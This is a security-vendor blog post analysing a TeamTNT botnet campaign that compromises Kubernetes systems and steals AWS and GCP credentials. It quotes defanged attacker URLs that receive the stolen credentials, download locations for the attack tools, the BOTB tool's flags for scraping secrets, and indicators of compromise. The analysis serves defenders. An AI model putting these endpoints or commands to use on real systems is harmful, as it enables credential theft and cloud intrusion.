# Botnet Deploys Cloud and Container Attack Techniques **[cadosecurity.com/post/botnet-deploys-cloud-and-container-attack-techniques](https://www.cadosecurity.com/post/botnet-deploys-cloud-and-container-attack-techniques)** January 18, 2021 **Botnet Deploys Cloud and Container Attack Techniques** We recently identified a campaign that deploys cloud and container specific attack tools. It is [the latest iteration of malware we reported on back in August 2020.](https://www.cadosecurity.com/post/team-tnt-the-first-crypto-mining-worm-to-steal-aws-credentials) [Earlier in 2021 we saw reports by AT&T and](https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader) [Trend Micro on a related campaign from](https://web.archive.org/web/20210109061251/https://www.trendmicro.com/en_us/research/21/a/malicious-shell-script-steals-aws-docker-credentials.html) [attackers called TeamTNT. More recently, we’ve seen independent researchers (1,](https://twitter.com/Suprn8/status/1349938276623384576) [2) and](https://twitter.com/r3dbU7z/status/1350195371952267264) [TenCent review more activity. Whilst we classify this as a botnet due to the centralised](https://security.tencent.com/index.php/blog/msg/175) [command and control, we note that TeamTNT themselves prefer the term “spreading script”.](https://twitter.com/HildeTNT/status/1350698045458018304) Below we’ve provided a quick outline of the significant updates that TeamTNT made to their crypto-mining campaign last week. The first obvious update is the logo deployed – “TeamTNT feat Borg – The Docker Gatling Gun”: ----- As before, the core of the botnet scans and compromises open Kubernetes systems. But there have been a number of updates. The AWS credential theft is significantly more sophisticated than the one we found back in August 2020, and shows improvements from [the later version reported on by Trend Micro. The botnet can now steal details from AWS IAM](https://www.zdnet.com/article/a-crypto-mining-botnet-is-now-stealing-docker-and-aws-credentials/) roles, and from both credential files and the AWS metadata URL: ----- The scripts posts the stolen credentials to one of two URLs: http://the.borg[.]wtf/incoming/access_data/aws.php http://45.9.150[.]36/incoming/access_data/aws.php Much of the exploitation chain and toolset remains the same as previous versions. There are a number of scanners, IRC backdoors and reverse shells to maintain access. There are some new cloud and container specific tricks though. TeamTNT now deploy – ----- [Tmate – A simple application for sharing terminals. This provides another method of](https://tmate.io/) maintaining access for the attackers. It is installed from http://45.9.150[.]36/pwn/t.sh [Break Out The Box – Break Out The Box (BOTB) is a penetration testing tool for cloud](https://github.com/brompwnie/botb) and containerised environments, continuing an impressive arsenal of capabilities: The parameters that BOTB is called with show the attackers now also try to steal credentials from Google Cloud Platform systems: _-scrape-gcp=true -recon=true -metadata=true -find-http=true -find-sockets=true -find-_ _docker=true -pwnKeyctl=true -k8secrets=true_ BOTM is installed from https://teamtnt[.]red/set/up/bob.php [Peirates – A penetration testing tool for Kubernetes. Installed from](https://www.inguardians.com/peirates/) https://teamtnt[.]red/set/up/pei.php **Conclusion** TeamTNT have significantly improved both the quality and scope of their attacks since our first report back in August 2020. They’ve displayed a high pace of improvement, and an array of cloud and container specific attacks. Cado Security continues to see a rise in attackers developing tools and techniques specifically targeting cloud and container environments. It is important organisations remain vigilant and continue to adapt to these new threats. Cado Security specialises in providing tooling and techniques that allow organisations to threat hunt and investigate cloud and container systems. If you are interested in knowing [more, please don’t hesitate to reach out, our pilot program is now open.](https://www.cadosecurity.com/demo) ----- **Further Reading** **Indicators of Compromise** teamtnt[.]red borg[.]wtf 45.9.150[.]36 About The Author Chris Doman [Chris is well known for building the popular threat intelligence portal ThreatCrowd, which](https://www.threatcrowd.org/) [subsequently merged into the AlienVault Open Threat Exchange, later acquired by AT&T.](https://otx.alienvault.com/) Chris is an industry leading threat researcher and has published a number of widely read articles and papers on targeted cyber attacks. His research on topics such as the North Korean government’s [crypto-currency theft schemes, and China’s attacks](https://www.wsj.com/articles/in-north-korea-hackers-mine-cryptocurrency-abroad-1515420004) against dissident websites, have been widely discussed in the media. He has also given interviews to print, [radio and TV such as CNN and BBC News.](https://www.youtube.com/watch?v=z_0oV_hsc08) **About Cado Security** Cado Security provides the cloud investigation platform that empowers security teams to respond to threats at cloud speed. By automating data capture and processing across cloud and container environments, Cado Response effortlessly delivers forensic-level detail and unprecedented context to simplify cloud investigation and response. Backed by Blossom Capital and Ten Eleven Ventures, Cado Security has offices in the United States and United [Kingdom. For more information, please visit https://www.cadosecurity.com/ or follow us on](https://www.cadosecurity.com/) Twitter [@cadosecurity.](https://twitter.com/CadoSecurity) [Prev Post](https://www.cadosecurity.com/responding-to-solarigate/) [Next Post](https://www.cadosecurity.com/cybersecurity-predictions-for-2021/) -----